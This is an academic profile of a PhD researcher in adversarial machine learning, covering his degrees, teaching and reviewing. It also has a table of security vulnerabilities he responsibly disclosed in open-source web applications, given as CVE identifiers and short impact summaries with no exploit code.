Martin Gubri is a PhD candidate at SnT center, University of Luxembourg. His research interests are in adversarial machine learning, with a focus on the transferability of adversarial attacks.
He is a Data Scientist graduated from Ensae ParisTech and a Statistician graduated from Toulouse School of Economics.
He has developed a personal interest in computer security, leading to the discovery of several FLOSS vulnerabilities.
PhD in Computer Science, 2023
University of Luxembourg, Luxembourg
Specialized Master in Data Science (w/ high honors), 2015
Ensae ParisTech, France
Master in Statistics and Econometrics (w/ highest honor), 2014
Toulouse School of Economics, France
Magistère in Economics and Statistics (w/ highest honor), 2014
Toulouse School of Economics and Paul Sabatier University, France
Bachelor in Economics and Mathematics, 2012
Toulouse School of Economics and Paul Sabatier University, France
FLOSS Contributions
Master: Advanced topics in Applied Machine Learning
2nd year of Master in Computer Science. Two lectures, design and correction of the project, planning.
Project: Creation and evaluation of fill-in-the-blank notebooks (part 1 on preprocessing and part 3 on adversarial examples)
Master: Introduction to Machine Learning
2nd year of Master in Space Science. Six sessions, including four based on the Machine Learning Refined book and one based on the Applied Machine Learning course of Andreas C. Müller. Summary slides.
Master: Introduction to Machine Learning
2nd year of Master in Space Science. Two introductory lectures on Machine Learning. Slides.
Bachelor: Software engineering 2
3rd year of Bachelor in Computer Science. Four introductory lectures on Machine Learning Engineering. Course given online during lockdown. Quizzes on Moodle. Videos, Slides
I served as a (co)-reviewer for the following conferences and journals.
Other academic services
I organize and animate the weekly Machine Learning Reading Group at the SerVal group (University of Luxembourg) since February 2021.
Contributions to FLOSS Security
Vulnerabilities discovered:
CVE | Software | Type | Description/Impact | Links |
---|---|---|---|---|
CVE-2017-6877 | Lutim | Stored XSS | Exposed all images uploaded by the user and their encryption keys | issue |
CVE-2017-10975 | Lutim | Stored XSS | Idem. Hard to exploit in pratice | issue |
CVE-2017-1000051 | CryptPad | Stored XSS | Exposed encryption keys of user data | blog post |
TeleR | RCE | 3 Arbitrary Code Executions on their server | blog post soon | |
Turtl | Stored XSS | 3 XSS exposing encrypted data (incl. passwords) | ||
NCrypt | Stored XSS | issue | ||
not disclosed | Stored XSS | |||
not disclosed | Stored XSS | |||
Shaarli | Stored XSS | Markdown plugin | MR | |
not disclosed | Stored XSS | |||
Framaforms | Improper Access Control | Exposed URL of all users forms | No public record | |
Framaforms | Stored XSS | Exposed responses of user forms. Too permissive formats allowed to untrusted users | issue | |
Framaforms | Stored XSS | issue | ||
Framaslides | Stored XSS | Markdown not sanitized | commit | |
Framaslides | Stored XSS | Escape markdown link sanitization (marked lib not updated) | issue | |
Framaslides | Stored XSS | issue | ||
CVE-2017-11594 | Loomio | Stored XSS | Markdown not sanitized. Allows to cast users’ votes using their identity | commit, demo |
Loomio | Stored XSS | No restrictions to attached files (when served locally). Allows to cast users’ votes using their identity | demo | |
Framemo & Sandstorm’s Scrumblr | Stored XSS | Markdown not sanitized | issue, PR | |
Framemo & Sandstorm’s Scrumblr | Formula Injection | issue, MR | ||
CVE-2017-1000039 | Framadate | Formula Injection | issue, MR | |
not disclosed | Stored XSS | |||
CVE-2017-11593 | Markdown Preview Plus Chrome’s Extension | Stored XSS | Led its users vulnerable to XSS in a ton of websites, by converting text, markdown and rst files to HTML without sanitization | issue |
not disclosed | Stored XSS | |||
Wallabag 2 & Graby | Stored XSS | PR | ||
Kresus | Stored Self-XSS | Possible to leverage it by importing a malicious JSON | issue | |
Dolomon | Stored (Self)-XSS | Multiple XSS. Some can be leveraged using a CSRF issue | issue | |
Dolomon | Improper Access Control | Gave access to the URLs saved by all users | issue | |
Dolomon | Formula Injection | issue | ||
not disclosed | Stored XSS | |||
share-on-diaspora Wordpress Plugin | Reflected Client XSS | Fixed, but not discovered. | PR |